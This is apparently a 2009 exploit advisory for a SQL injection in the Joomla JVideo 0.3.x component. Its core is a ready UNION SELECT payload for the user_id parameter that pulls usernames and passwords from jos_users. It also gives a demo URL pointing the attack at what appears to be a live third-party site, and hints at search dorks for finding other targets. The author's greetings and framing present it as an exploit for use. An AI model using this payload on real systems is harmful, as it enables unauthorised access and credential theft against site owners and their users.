Joomla Component JVideo 0.3.x SQL Injection Vulnerability

2009-05-29 23:33:35

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_jvideo (user_id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author : Chip D3 Bi0s
[+] Greetz : d4n!ux + x_jeshua + eCORE + Painboy + rayok3nt + 3l3cTron1k_0
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
--------------------------------------------------
author : Russell...
author Email : chipdebios[alt+64]gmail.com

###################################################

Example:
http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code]


SQL code:
+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users


DEMO:


http://www.mosessite.com/index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users

etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

<name>JVideo!</name>
<creationDate>September 2008</creationDate>
<author>Infinovision.com</author>
<authorEmail>[email protected]</authorEmail>
<authorUrl>http://www.infinovision.com</authorUrl>
<copyright>Copyright 2008 Infinovision.com</copyright>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<version>0.3.11c Beta</version>
<description>JVideo! Component</description>

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.